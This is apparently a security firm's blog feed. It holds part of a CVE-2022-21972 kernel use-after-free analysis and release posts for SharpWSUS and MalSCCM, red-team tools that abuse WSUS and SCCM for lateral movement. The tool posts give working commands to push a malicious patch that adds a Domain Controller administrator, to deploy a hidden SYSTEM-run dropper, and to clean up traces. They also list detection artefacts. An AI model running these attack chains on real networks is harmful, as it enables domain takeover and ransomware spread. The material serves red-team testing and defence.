Another thing to consider is how do we know if the race condition was successful or a failure? Thankfully in this regard the server socket being closed on timeout works in our favour as this will cause a socket exception on the client if we attempt to send any more data once the server closes the socket. Once the socket is closed we know that the race is finished but we don’t necessarily know if we did or didn’t win the race.

With these considerations in place, how do we trigger the vulnerability? It actually becomes a simple proof of concept. Effectively we just continually send EchoRequest PPTP control frames in 90 frame bursts to a server until the timeout event occurs and then we hope that we’ve won the race.

We won’t be releasing the PoC code until people have had a chance to patch things up but when the PoC is successful we may see something like this on our target server:

Because the PptpCtlCtx structure is de-initialised there are a lot of pointers and properties that contain invalid values that, if used at different parts of the Receive Event handling code, will cause crashes in non fun ways like Null pointer deference’s. This is actually what happened in the Blue Screen of Death above, but the CtlpEngine function did still process a freed PptpCtlCtx structure.

Can we use this vulnerability for anything more than a simple BSOD?

Exploitation

Due to the state of mitigation in the Windows kernel against memory corruption exploits and the difficult nature of this race condition, achieving useful exploitation of the vulnerability is not going to be easy, especially if seeking to obtain Remote Code Execution (RCE). However, this does not mean it is not possible to do so.

Exploitability – The Freed Memory

In order to asses the exploitability of the vulnerability, we need to look at what our freed memory contains and where about it is in the Windows kernel heap. In windbg we can use the !pool command to get some information on the allocated chunk that will be freed in our UaF issue.

ffff828b17e50d20 size: 2a0 previous size: 0 (Allocated) *PTPT

We can see here that the size of the freed memory block is 0x2a0 or 672 bytes. This is important as it puts us in the allocation size range for the variable size kernel heap segment. This heap segment is fairly nice for use after free exploitation as the variable size heap also maintains a free list of chunks that have been freed and their sizes. When a new chunk is allocated this free list is searched and if a chunk of an exact or greater size match is found it will be used for the new allocation. Since this is the kernel, any other part of the kernel that allocates non paged pool memory allocations of this or a similar size could end up using this freed slot as well.

So, what do we need in order to start exploiting this issue? ideally we want to find some allocated object in the kernel that we can control the contents of and allocate at 0x2a0 bytes in size. This would allow us to create a fake PptpCtlCtx object, which we can then use to control the CtlpEngine state machine code. Finding an exact size match allocation isn’t the only way we could groom the heap for a potential exploit but it would certainly be the most reliable method.

If we can take control of a PptpCtlCtx object what can we do? One of the most powerful bits of this vulnerability from an exploit development perspective are the callback functions located inside the PptpCtlCtx structure. Usually a mitigation called Control Flow Guard (CFG) or Xtended Flow Guard (XFG) would prevent us from being able to corrupt and use these callback pointers with an arbitrary executable kernel address. However CFG and XFG are not enabled for the raspptp.sys driver (as of writing this blog) meaning we can point execution to any instruction located in the kernel. This gives us plenty of things to abuse for exploitation purposes. A caveat to this is that we are limited to the number of these gadgets we can use in one trigger of the vulnerability, meaning we would likely need to trigger the vulnerability multiple times with different gadgets to achieve a full exploit or at least that’s the case on a modern Windows kernel.

Exploitability – Threads

Allocating an object to fill our freed slot and take control of kernel execution through a fake PptpCtlCtx object sounds great, but one additional restriction on the way in which we do this is that we only have access to CtlpEngine using the freed object for a short period of CPU time. We can’t use the same thread that is processing the CtlpEngine to allocate objects to fill the empty slot, and if we do it would be after the thread has returned from CtlpEngine. At this point the vulnerability will no longer be exploitable.

What this means is that we would need the fake object allocations to be happening in a separate thread in the hope that we can get one of our fake objects allocated and populated with our fake object contents while the vulnerable kernel thread is still in CtlpEngine, allowing us to then start doing bad things with the state machine. All of this sounds like a lot to try and get done in relatively small CPU windows, but it is possible that it could be achieved. The issue with any exploit attempting to do this is going to be reliability, since there is a fairly high chance a failed exploit would crash the target machine and retrying the exploit would be a slow and easily detectable process.

Exploitability – Local Privilege Escalation vs Remote Code Execution

The ability to exploit this issue for LPE is much more likely to be successful over the affected Windows kernel versions than exploiting it for RCE. This is largely due to the fact that an RCE exploit will need to be able to first leak information about the kernel using either this vulnerability or another one before any of the potential callback corruption uses would be viable. There are also far fewer parts of the kernel accessible remotely, meaning finding a way of spraying a fake PptpCtlCtx object into the kernel heap remotely is going to be significantly harder to achieve.

Another reason that LPE is a much more viable exploit route is that the localhost socket or 127.0.0.1 allows for far more data than the ethernet frame capped 1,500 bytes we get remotely, to be processed by each WSK Receive event callback. This significantly increases most of the variables for achieving successful exploitation!

Conclusion

Wormable Kernel Remote Code Execution vulnerabilities are the holy grail of severity in modern operating systems. With great power however comes great responsibility. While this vulnerability could be catastrophic in its impact ,the skill to pull off a successful and undetected exploit is not to be underestimated. Memory corruption continues to become a harder and harder art form to master, however there are definitely those out there with the ability and determination to achieve the full potential of this vulnerability. For these reasons CVE-2022-21972 is a vulnerability that represents a very real threat to internet connected Microsoft based VPN infrastructure. We recommend that this vulnerability is patched with priority in all environments.

Timeline

  • Vulnerability Reported To Microsoft – 29 Oct 2021
  • Vulnerability Acknowledged – 29 Oct 2021
  • Vulnerability Confirmed – 11 November 2021
  • Patch Release Date Confirmed – 12 November 2021
  • Patch Release – 10 May 2022

The post CVE-2022-21972: Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 1) appeared first on Nettitude Labs.

Introducing SharpWSUS

5 May 2022 at 09:00

Today, we’re releasing a new tool called SharpWSUS.  This is a continuation of existing WSUS attack tooling such as WSUSPendu and Thunder_Woosus. It brings their complete functionality to .NET, in a way that can be reliably and flexibly used through command and control (C2) channels, including through PoshC2.

The Background to SharpWSUS

During a recent red team engagement, a client wanted to see if a backup server could be compromised. The backup server was critical to the organisation and had consequently been the target of several rounds of red teaming and subsequent remediation, making compromise difficult. During this engagement, we found that the backup server had been removed from Active Directory (AD) and was also segmented from the network, making common lateral movement techniques unsuitable. The only common path seen was Remote Desktop Protocol (RDP) from certain hosts on the network to the target server with a local account. However, no local account was identified during the engagement. With this in mind, we looked for other avenues, for example leveraging servers that would need to connect to all other servers in the environment, and which would need to authenticate and issue code in some way. Enter Windows Server Update Services (WSUS).

Download SharpWSUS

github GitHub: https://github.com/nettitude/SharpWSUS

WSUS Introduction

WSUS is a Microsoft solution for administrators to deploy Microsoft product updates and patches across an environment in a scalable manner, using a method where the internal servers do not need to reach out to the internet directly. WSUS is extremely common within Windows corporate environments.

WSUS Architecture

Typically, the architecture of WSUS deployments is quite simple, although they can be configured in more complex ways. The most common deployment consists of one WSUS server within the corporate network. This server will reach out to Microsoft over HTTP and HTTPS to download Microsoft patches. After downloading these, the WSUS server will deploy the patch to clients as they check in to the WSUS server. Communication between the WSUS server and the clients will occur on port 8530 for HTTP and 8531 for HTTPS. An example of this deployment is below:

Diagram Description automatically generated

This image is from https://docs.microsoft.com/de-de/security-updates/windowsupdateservices/18127657.

In a more complex deployment of WSUS, there may be one main WSUS server that communicates over the internet to Microsoft, then internally the main WSUS server pushes the patches out to other internal WSUS servers, which then deploy it to clients. In this scenario the WSUS server connecting to the internet would be known as the Upstream Server, and the WSUS servers that do not have internet access and get their patches from the Upstream Server would be Downstream Servers. An example diagram of this is below:

Diagram Description automatically generated

This image is from https://docs.microsoft.com/de-de/security-updates/windowsupdateservices/18127657.

The most common deployment seen is a singular WSUS server deploying patches to all clients within the estate. This deployment means that one server in the environment can communicate to all servers and clients managed by WSUS, which make WSUS a very attractive target for bypassing network segmentation.

SharpWSUS

Attacks on WSUS are nothing new and there is already fantastic tooling out there for abusing WSUS for lateral movement such as WSUSPendu (https://github.com/AlsidOfficial/WSUSpendu), which is the PowerShell script that formed the basis for this tool. There is also another .NET tool publicly available called Thunder_Woosus (https://github.com/ThunderGunExpress/Thunder_Woosus) which aimed to take some functionality from WSUSPendu and port it to .NET.

SharpWSUS is a continuation of this tooling and aims to bring the complete functionality of WSUSPendu and Thunder_Woosus to .NET in a tool that can be reliably used through C2 channels and offers flexibility to the operator.

The flow of using SharpWSUS for lateral movement is as follows:

  • Locate the WSUS server and compromise it.
  • Enumerate the contents of the WSUS server to determine which machines to target.
  • Create a WSUS group.
  • Add the target machine to the WSUS group.
  • Create a malicious patch.
  • Approve the malicious patch for deployment.
  • Wait for the client to download the patch.
  • Clean up after the patch is downloaded.

Locating the WSUS server

The WSUS server that a client is using can be found by querying the following registry key:

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate

This key will be present on any workstation or server managed through WSUS. Since the most common deployment is of a singular WSUS server, there is a good chance that the one in the key is the same one used for critical servers.

This can be enumerated through SharpWSUS using SharpWSUS.exe locate.

Text Description automatically generated

Enumerating the WSUS server

Once the WSUS server is compromised, SharpWSUS can be used to enumerate various details about the WSUS deployment, such as the computers being managed by the current server, the last time each computer checked in for an update, any Downstream Servers, and the WSUS groups.

This is done through the command SharpWSUS.exe inspect.

Text Description automatically generated

This provides the information needed to choose which machine to target in the environment. For example, within this environment this WSUS server managed the Domain Controllers such as bloredc2.blorebank.local. This is a common configuration of WSUS and often not treated as critical as Domain Controllers or other assets it manages. For this demo we will compromise the Domain Controller by adding a new local administrator.

Lateral Movement

A key consideration with WSUS lateral movement is that there is no way to control when a client checks in from the server. This means that once a patch is deployed the lateral movement won’t succeed until the client installs the update. Often times the client will check in for patches on a regular cycle, for example daily, but the patches won’t be installed until a patching day that might happen once a month. Some clients may be configured to install patches immediately if their priority level is high enough.

The first step of abusing WSUS is to create the malicious patch, which does have some limitations. When creating the patch there are various values that can be configured through the command line in SharpWSUS, allowing the operator to change the Indicators of Compromise (IoCs) of the patch. There is also a value for the payload and arguments. The payload must be a Microsoft signed binary and must point to a location on disk for the WSUS server to that binary.

While the need for a signed binary can limit some attack paths, there are still plenty of binaries that could be used such as PsExec.exe to run a command as SYSTEM, RunDLL32.exe to run a malicious DLL on a network share, MsBuild.exe to grab and execute a remote payload and more. The example in this blog will use PsExec.exe for code execution (https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).

A patch leveraging PsExec.exe can be done with the following command:

SharpWSUS.exe create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add && net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"

Note that the way the quotes are escaped will change based on how you are executing the command. The escaping above is the command used within PoshC2.

Text Description automatically generated

Note the GUID returned from the command as this GUID is the Update ID of the patch and will be needed for further commands including cleaning up.

This malicious patch uses the PsExec.exe binary stored on the WSUS server which was uploaded through the C2. This patch will add a new user with the username WSUSDemo and grant them administrative rights over whichever machine it is installed on.

When the patch is created it will be visible in the WSUS console. The patch made can be seen below:

Graphical user interface, text, application Description automatically generated

If the patch is clicked, then more information can be seen:

Graphical user interface, text, application, email Description automatically generated

As part of the patch creation process, the binary used in the patch is also copied to the WSUS content location and called “wuagent.exe”. In this case the WSUS content location is “C:\UPDATES\WsusContent”, and the binary will be copied too “C:\UPDATES\wuagent.exe”. This allows it to be collected from the WSUS client. If the binary is executed the PsExec.exe help menu is seen, showing its just a copy of the Windows signed binary.

Text Description automatically generated

After the patch is made, the next steps are to create a group, add the target computer to the group and then deploy the patch to that group. This is due to WSUS patches being approved per WSUS group and not per machine. This means that for targeting a specific machine, it would be necessary to ensure that the machine is in a group with no other machines.

This can be done with one command in SharpWSUS through the following command:

SharpWSUS.exe approve /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:"Demo Group", where the updateid GUID is the one provided in the output of the create command.

Text Description automatically generated

This will check if the group “Demo Group” exists and create it if it doesn’t. It will then add the Domain Controller to the group and approve the malicious patch for the group.

You can check the group being created by running the inspect command again.

Graphical user interface, text Description automatically generated

This can also be seen in the WSUS console.

Graphical user interface, text, application Description automatically generated

After this it is a waiting game for the client to download and install the patch. SharpWSUS can be used to enumerate the status of the update:

SharpWSUS.exe check /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local”, where the updateid is the same as before.

Text Description automatically generated

This value is pretty slow to update and can be unreliable. It is the same way using the WSUS console as well, it seems like WSUS is just not very efficient at tracking status. Until the target computer next checks in the value will not be populated so it will return the message above.

To speed up the demo the client will be forced to look for updates.

Graphical user interface, text, timeline Description automatically generated with medium confidence

This showed important updates to be installed…

Timeline Description automatically generated

… including the malicious patch.

Graphical user interface, application, Word Description automatically generated

Checking the local Administrators group of the DC to make sure there is no conflicting user:

Graphical user interface, text Description automatically generated

Then the patch is installed:

Text Description automatically generated with medium confidence

The new local administrator was made on the Domain Controller!

Graphical user interface, application Description automatically generated

Once the patch is installed on the target machine, the client will be able to see the following information.

Graphical user interface, text, application, email Description automatically generated

If they click on the title of the update they will be taken to the details for the patch.

Graphical user interface, text, application, email Description automatically generated

Once the client has checked in the status will be updated. This is still delayed and can take time to alter in the database. It seems the value will be updated when the computer next checks-in after its installed, which can take a few check-ins.

Text Description automatically generated

Once the patch is installed clean-up can be performed within SharpWSUS with the following command:

SharpWSUS.exe delete /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:”Demo Group”

Text Description automatically generated

This will decline the patch, delete the patch, remove the target from the group and delete the group.

Looking on the WSUS console it can be seen that the group is removed.

Graphical user interface, text, application Description automatically generated

If the patch is explicitly searched for within WSUS, it is no longer there.

Graphical user interface, text, application, email Description automatically generated

It should be noted that the patch binary “wuagent.exe” will remain on disk and is up to the operator to delete manually.

Protecting Against WSUS Abuse

Lateral movement through WSUS is not a new technique, however it is an option that will likely remain available to attackers for some time. Whilst preventing this access to local SYSTEM to abuse WSUS like this is not possible, it is possible to understand the attack path and take precautions.

The best defence against this would be segmenting the WSUS server from the network so that the server itself is more difficult to compromise, along with implementing a tiered WSUS structure with Upstream and Downstream Servers so that clients can be distributed between each relevant WSUS server.

Segmentation of the WSUS servers from the network makes the WSUS server more difficult to compromise and can force an attacker down a specific path that could be detected. Separating clients out to different WSUS servers limits where an attacker can laterally move to after compromising a downstream Server.

Various artefacts exist that may present an opportunity for detection:

  • A new WSUS group with one host is likely to be created. For more mass ransomware type attacks this may be all hosts in a new group.
    • The default group name within SharpWSUS is “InjectGroup”
  • The malicious patch itself and its metadata could all lead to detection opportunity if looking for patches outside of the normal Microsoft patches. The default patch created by SharpWSUS will have the following metadata:
    • Title: “SharpWSUS Update”
    • Date: “2021-09-26”
    • Rating: “Important”
    • KB: “5006103”
    • Description: “Install this update to resolve issues in Windows.”
    • URL: “https://www.nettitude.com”
  • When the patch is created, a Microsoft signed binary will be copied to the WSUS web root. If the WSUS content location was C:\Updates\WSUSContent for example, then the signed binary would be placed in C:\Updates\WUAgent.exe. This binary will not be removed after the patch is deleted, so this binary on disk could provide detection cases for WSUS being abused and may indicate what the abuse was (such as PsExec.exe, MsiExec.exe etc).
  • When the WSUS patch is approved, the user that approved it is stored and can be seen in the console. This appears to be often “WUS Server”, and that is what SharpWSUS will use. If your environment uses an alternate approval user then this could stand out.

Summary

WSUS is a core part of Windows environments and is very often deployed in a way that would allow an attacker to use it to bypass internal networking restrictions. This blog has not detailed any new attack techniques, but the release of SharpWSUS (https://github.com/nettitude/SharpWSUS) aims to aid with offensive security professionals utilising this attack path through C2 to demonstrate the risks and aid with improvement.

Download SharpWSUS

github GitHub: https://github.com/nettitude/SharpWSUS

The post Introducing SharpWSUS appeared first on Nettitude Labs.

Introducing MalSCCM

4 May 2022 at 09:00

During red team operations the goal is often to compromise a system of high value. These systems will ideally be segmented from the wider network and locked down to prevent compromise. However, the organisation still needs to be able to manage these devices in scalable and reliable ways, such as being able to deploy patches or scripts for administration. Enter Microsoft System Centre Configuration Manager (SCCM).

Download MalSCCM

Today, we have released MalSCCM, which takes some of the functionality of PowerSCCM and enhances some usage aspects, making it more appropriate for Command and Control usage.

We will be presenting a talk that covers two new tools, including this one, at Black Hat Asia on May 13th @ 10:15 SGT.  You can download MalSCCM from the repository below.

github GitHub: https://github.com/nettitude/MalSCCM

Read on for more information about how MalSCCM can be used to laterally move and act on objectives.

SCCM Introduction

SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation. SCCM allows for a great deal of functionality, including pushing PowerShell scripts to its clients, pushing commands to its clients, opening remote terminal sessions on clients, installing software on its clients, altering policies on its clients and more.

This range of functionality makes it an ideal target for attackers that want to laterally move within an environment whilst blending in with normal activity. To compromise SCCM it is necessary to understand the different ways SCCM can be deployed within an environment.

SCCM Architecture

SCCM can be deployed in a number of ways to be ideal for the target environment, however there is some common terminology:

  • Central Administration Site – When there are multiple Primary Sites (environments) this will be the one central location that management is performed from and will be passed down to each relevant Primary Site. Installation of a Central Administration Site can only be done for large environments with more than 100,000 clients.
  • Primary Site – These are the main management points for each environment. Unless a Central Administration Site is within the environment, this will be the point where all management is performed and pushed out.
  • Secondary Site – These sites are children of Primary Sites and are managed by the Primary Site, however they have their own SQL databases, and they aid with establishing connections between endpoint clients and the Primary Site.
  • Distribution Point – These are the servers that actually deliver the contents of the updates to the endpoint clients. Each Distribution Point supports up to 4,000 clients, and by default both Primary Sites and Secondary Sites are also a Distribution Point.

With this range of roles within SCCM, there are a large number of configurations for how any given endpoint may be retrieving updates. A visual representation of a possible hierarchy is below: SMS/SCCM, Beyond Application Deployment - Matthew Hudson: Hierarchy Simplification and Secondary&#39;s

The image above is from http://sms-hints-tricks.blogspot.com/2012/06/hiearchy-simplification-and-secondarys.html.

The simplest configuration is a Primary Site which has no children Secondary Sites and the Primary Site acts as the Distribution Point itself. This allows SCCM to be deployed and used in the environment with only one server, which is performing all of the roles and can support up to 4,000 clients.

A more robust deployment would be a Primary Site that is segmented from the corporate network which can only talk to Secondary Sites. These Secondary Sites would also be segmented in various parts of the network for various environments. These Secondary Sites would then communicate with Distribution Points on the network which in turn will communicate with the endpoints.

Through either of these deployment styles, if the Primary Site can be compromised, then it offers a great advantage to attackers for widespread command execution. This could be used to proliferate ransomware at scale through an environment, or it could be used to target specific machines and laterally move to them in a variety of ways.

MalSCCM

Tooling for red teams and attackers has long since shifted to .NET, however there are very few tools publicly available for abusing SCCM, making it an attack path that may not be explored as much.

For PowerShell there is PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM) which is great, however using it through C2 introduces a lot of Indicators of Compromise (IoC) for running PowerShell, which may not be appropriate depending on the target’s defence.

With the release of this blog post, Nettitude has released MalSCCM (https://github.com/nettitude/MalSCCM) which takes a subset of the functionality of PowerSCCM and enhances some usage aspects, making it more apt for C2 usage.

As this is the first release of MalSCCM, it currently only enables the abuse of application deployments for lateral movement through SCCM, however this seems to be a reliable method for lateral movement. The functionality included within MalSCCM may increase over time as more attack paths are explored.

MalSCCM – Understanding the deployment

The first hurdle of targeting SCCM is understanding how SCCM is deployed in the environment and which servers to target.

Assuming this is a red team scenario, the first machine compromised is likely an employee’s machine. Whilst on the machine it is worth looking out for processes that indicate the machine is managed by SCCM such as CcmExec.

A screenshot of a computer Description automatically generated with medium confidence

These processes are present on any machine that is an SCCM client, whether it’s a server or a workstation. If the machine is managed by SCCM then it needs to know where its Distribution Point is. This is a value held in the registry and can be read through the following command: MalSCCM.exe locate.

Text Description automatically generated

The locate command will tell you what the SiteCode of the SCCM deployment is (used by SCCM to differentiate Primary Sites) as well as the Distribution Point for the machine. From the endpoint client it is not possible to tell at this point whether the Distribution Point is also the Primary Site, however it may be possible to tell through LDAP looking at naming conventions or descriptions of the server.

Within a red team scenario, it would then be necessary to compromise the environment to a point where you can compromise that Distribution Point. This could for example be compromising a user that is an SCCM administrator or it could be compromising infrastructure administrators, LAPS etc.

If you wanted to assess whether the Distribution Point was also the Primary Site and you didn’t want to get a C2 implant on the server, you could enumerate this through MalSCCM by trying a command such as below:

MalSCCM.exe inspect /server:<DistributionPoint Server FQDN> /groups

If you run this command as an administrator of the Distribution Point server, then this will connect over WMI and attempt to enumerate the local databases. If this returns group information, then the Distribution Point is also the Primary Site.

Text Description automatically generated

In this scenario you could then do all of the SCCM exploitation remotely through MalSCCM by using the /server flag on all commands. This allows you to deploy malicious applications and laterally move without ever getting C2 on the SCCM server itself.

If the remote inspect fails or you want confirmation of the server role, then you could compromise the Distribution Point and run the locate command again on the server:

MalSCCM.exe locate

The Distribution Point will have more registry keys of interest than an endpoint client. When running locate on a Distribution Point it will tell you where it is getting its updates from, which is usually the Primary Site.

Text Description automatically generated

There are multiple registry keys enumerated because the first registry key is not present if you run the command on a Primary Site itself (if it utilises secondary sites).

This tool has not been tested on an environment with Secondary Sites configured, however it is likely that the Distribution Point would return the location of the Secondary Site, and that server would then need to be compromised to find the Primary Site in the same way.

MalSCCM Enumeration

Once the Primary Site is found, it is possible to use the inspect command within MalSCCM to gather information about the SCCM deployment through various WMI classes used by SCCM. As the information returned can be very large, the inspect command has been split into modules.

The modules at release are listed below:

  • Computers – This will return all the computers managed through SCCM. This command will return just the computer name to reduce the output.
  • Groups – This will return all of the SCCM groups. Computers in SCCM can be combined into Groups for pushing applications out, so for example you may have a group for all computers, all application servers, etc. MalSCCM will return the group names and the number of members.
  • PrimaryUser – Within SCCM its possible to have a setting allowed which allows SCCM to track which users are using which machines and create an affiliation between them. Using this can be possible to hunt for specific users in the environment, which is very useful.
  • Forest – This will tell you the SCCM forest name.
  • Packages – This will enumerate the SCCM packages currently listed.
  • Applications – This will return the SCCM applications currently listed within SCCM.
  • Deployments – This will return the SCCM deployments within SCCM.

If you want to gather all information you can run the command:

MalSCCM.exe inspect /all /server:<PrimarySiteFQDN>

This will return all of the above information. These commands are useful for understanding various aspects of SCCM before, during and after exploitation.

Abusing SCCM for Lateral Movement

MalSCCM can be used for lateral movement through malicious SCCM applications.

Since SCCM works with the concepts of groups rather than individual machines for deployments, the best way to target an individual machine is to create a new SCCM group which blends in with the existing ones, then adding the target machine into that group. This allows the malicious application to be applied only to the target machine and allows for cleaning up after the attack.

The workflow of the attack is as follows:

  • Compromise a Primary Site.
  • Enumerate the Primary Site to understand which machines to target.
  • Create a new group that blends in with the current groups.
  • Add the target machine to the new group.
  • Create a malicious application.
  • Deploy the application to the group containing the target.
  • Force the target group to check in with SCCM.
  • Once laterally moved, clean up the deployment and application.
  • Delete the target group.

The functionality for all steps of the above process is within MalSCCM, allowing you to perform this chain through C2 conveniently.

To demonstrate this attack chain, the Primary Site of the lab has been compromised. To keep command lines small and screenshots readable, the C2 will be deployed on the Primary Site itself and is running with high integrity.

The computers will be enumerated to check which targets are possible through SCCM:

MalSCCM.exe inspect /computers

Text Description automatically generated

If a user was being hunted instead of a specific machine, then it may be possible to enumerate the user’s location through SCCM. Within SCCM there is an optional feature called User Device Affinity. If User Device Affinity is enabled SCCM will track the logon sessions within each client and if a login session exceeds a configured amount of time, then it will affiliate that user with that computer. This affiliation will be kept within the SCCM database and can be used by SCCM to send applications out to users by knowing which machines they are assigned to. The users affiliated with a machine are the Primary Users for that machine. There can be multiple per machine.

The affiliated Primary Users will be enumerated to determine if we can hunt for specific users:

MalSCCM.exe inspect /primaryusers

Text Description automatically generated

The groups will be enumerated to determine the current group names:

MalSCCM.exe inspect /groups

Text Description automatically generated

For this demonstration the goal would be to compromise the user Ben. From the Primary Users we can tell that this user often uses the machine WIN2016-SQL. This machine is managed through SCCM so we will deploy a malicious application to laterally move to the machine.

A new group will be created that blends in with the environment. Groups can either be user groups or computer groups within SCCM, so MalSCCM will allow you to create either. If you create a user group and add the target user, then SCCM will use the Primary User affiliations discussed previously to determine which machine it should deploy the application too. This could result in the same end goal but to manage risk and ensure the right machines are being compromised, the preference is creating a computer group.

MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device

Text Description automatically generated

With the computer group created it should be listed through inspect.

MalSCCM.exe inspect /groups

Text Description automatically generated

With the group made, the target computer is added to the group. Note that if you try to use adduser instead of addhost to add a device into a device group, it will break that group and prevent deletion, so make sure you are using the right command for the resource you are adding.

MalSCCM.exe group /addhost /groupname:TargetGroup /host:WIN2016-SQL

Text Description automatically generated

This is then inspected to ensure the user count increased in the group.

MalSCCM.exe inspect /groups

Graphical user interface, text, application Description automatically generated

This group can also be seen in the SCCM console.

Graphical user interface, text, application, email Description automatically generated

A malicious application then needs to be made. For MalSCCM the malicious application will just point to a UNC path to the application to run as SYSTEM. The simplest case would be to upload a malicious EXE and use that. Since the target endpoint will run this as SYSTEM, it’s important that the malicious EXE is placed in a share that is accessible by the target computer account rather than the user.

In this case a simple dropper EXE will be uploaded to a share. When SCCM is installed, a share is exposed on Distribution Points called SCCMContentLib$. This share is readable by all users, and would be utilised by SCCM, making it an ideal place for the malicious binary.

The malicious application will then be made pointing to the malicious EXE.

MalSCCM.exe app /create /name:demoapp /uncpath:”\\BLORE-SCCM\SCCMContentLib$\localthread.exe”

Text Description automatically generated

Inspect can be used to check that the application now exists.

MalSCCM.exe inspect /applications

Text Description automatically generated

This application will be hidden from the SCCM administrative console when created through MalSCCM, which is a useful feature however it is a noteworthy detection opportunity, since most legitimate applications would not be hidden.

Graphical user interface, application Description automatically generated

With the application made, it then needs to be deployed. MalSCCM can be used to create a deployment for the target group.

MalSCCM.exe app /deploy /name:demoapp /groupname:TargetGroup /assignmentname:demodeployment

Text Description automatically generated

Inspect can be used to ensure the deployment was created.

MalSCCM.exe inspect /deployments

Text Description automatically generated

This will return the deployment and the application that will be deployed with it. It should be noted that even though the application can be hidden from the SCCM console, the deployment can not be.

Graphical user interface, application Description automatically generated

Within the deployment the application name can be seen, and there will be a link for related objects.

Chart, bar chart Description automatically generated

If you click on that application link, it will show you the malicious application.

Graphical user interface, text, application Description automatically generated

However, if you were to click out of this menu and back into applications, the application will not be found.

Graphical user interface, text, application Description automatically generated

This is an interesting case for administrators or investigators trying to determine if SCCM has been abused. Hidden applications such as these could also be found through PowerShell for investigation, discussed more at the end of this blog post.

With the deployment made, it is possible to use MalSCCM to attempt to make the target group check in.

MalSCCM.exe checkin /groupname:TargetGroup

Text Description automatically generated

This can take time for a natural check in, however assuming the clients are online and connected, the check in should happen fairly quickly (within the lab this had a range of immediate to a few minutes). In this demo the time difference between the checkin command being issued and the implant coming back was just under 30 seconds.

After the application executed our EXE a new PoshC2 implant arrived!

It can be seen that the process name of the implant is localthread as that was the binary name for our dropper. It is also running as SYSTEM as expected.

The parent process of this is WmiPrvSE.exe, which is normal for activities happening through WMI connections. If SCCM abuse is suspected, then indicators of WMI activity may be useful to collect.

At this point the binary on the share is able to be deleted, suggesting that the binary being used on the target has been copied locally as binaries in use cannot be removed. Searching for it locally on the machine returned the following locations on disk on the target:

  • C:\Windows\Prefetch\LOCALTHREAD.exe-9A0EB550.pf

This prefetch file could be analysed using a tool such as PECmd (https://ericzimmerman.github.io/#!index.md), which would allow visibility of the modules loaded by the process.

Cleanup

Since lateral movement was successful, clean-up is performed. MalSCCM has a clean-up function that will attempt to look for deployments of the application and remove them.

MalSCCM.exe app /cleanup /name:demoapp

Text Description automatically generated

If multiple deployments have been performed with the same application, then this command should be run multiple times until there are the deployments and applications are removed. In this instance it was executed only once since there was only one deployment.

MalSCCM.exe inspect /deployments

Text Description automatically generated

MalSCCM.exe inspect /applications

Text Description automatically generated

With the application cleared, the target group can be deleted, reverting SCCM back to its original configuration.

MalSCCM.exe group /delete /groupname:TargetGroup

Text Description automatically generated

Checking with inspect to ensure the group is removed.

MalSCCM.exe inspect /groups

Graphical user interface Description automatically generated with medium confidence

Attack Recap

To recap the attack path and usage of MalSCCM, the steps were as follows:

  • Locate the Primary Site using MalSCCM.exe locate on a Distribution Point.
  • Enumerate the Primary Site using MalSCCM.exe inspect /all.
  • Create a new group using MalSCCM.exe group /create /groupname:<> /grouptype:device.
  • Add the target machine to the group using MalSCCM.exe group /addhost /groupname:<> /host:<>.
  • Upload a malicious binary to a share readable by Domain Computers.
  • Create a malicious application pointing to your binary using MalSCCM.exe app /create /name:<> /uncpath:<>.
  • Deploy the malicious application to the group containing your target using MalSCCM.exe app /deploy /name:<> /groupname:<> /assignmentname:<>.
  • Make the target check in to SCCM for an update using MalSCCM.exe checkin /groupname:<>.
  • Clean-up tracks using MalSCCM.exe app /cleanup /name:<>.
  • Clean-up the group using MalSCCM.exe group /delete /groupname:<>.

Protecting against SCCM Abuse

For defence teams looking to defend against this type of lateral movement the key item would be good segmentation. If an attacker can already compromise your SCCM Primary Site then they are likely already in a very privileged position within the network, and SCCM may be a target used for mass ransomware or accessing specific targets that may be well segmented in other areas.

The common architecture for SCCM relies on fewer servers and ease of access across a wide environment, however setting up SCCM with a more segmented hierarchy forces attackers to make more hops in the network before reaching the Primary Site, which provides a greater chance of detection.

An idea for segmentation would be having a Primary Site that is only accessible on the network from Secondary Sites or Distribution Points on the ports necessary for SCCM functionality. Then having the Secondary Sites/Distribution points on the network segments necessary to talk to the clients, but only exposing the ports needed for SCCM. This could then be scaled to environment size, but with the same isolated design.

Administration of SCCM could then be done through Privileged Access Workstations (PAWs) with appropriate access measures. This would lock down the SCCM servers, making the jumps necessary to compromise SCCM less attractive for attackers.

Once on the SCCM server, the WMI utilities leveraged are all normal actions exposed in the SCCM console. However, there are some actions that could maybe be points for detection:

  • New SCCM groups being created with only few members,
  • Applications being created that are hidden (these could be enumerated through WMI and alerted on for any application with the hidden flag set),
  • Deployments being pushed to standard groups such as All Computers,
  • Locking down unsigned executables being executed on the endpoints.

PowerShell Investigation

PowerShell can be used to investigate SCCM deployments, so some useful commands are being shared here to aid defenders. These commands are all executed on the SCCM Primary Site.

To use PowerShell with SCCM you will need to first locate the site code. This can be done through the following command:

Get-WmiObject -Namespace “root\ccm” -Query “Select Name FROM SMS_Authority”

Text Description automatically generated

This will return SMS:<SiteCode>. This SiteCode can then be used in further WMI queries for SCCM. In this case the SiteCode is LON, so we would replace <SiteCode> in the future commands with LON.

To list all groups the following command can be used:

Get-WmiObject -Namespace "root\sms\site_<SiteCode>" -Query "Select Name,MemberCount,Comment FROM SMS_Collection"

Text Description automatically generated

This will return the group names, the member counts and the comment. When MalSCCM creates a group, it will do it with no comment, which may be unusual on the environment depending on the SCCM administrator’s workflow.

To list all applications and whether they are hidden or not, the following command could be used:

Get-WmiObject -Namespace "root\sms\site_<SiteCode>" -Query "Select LocalizedDisplayName, IsHidden FROM SMS_APPLICATION"

Graphical user interface, text Description automatically generated

This returned Test which is a legitimate application created in the SCCM console and is not hidden. It also returned demoapp created through MalSCCM which is hidden.

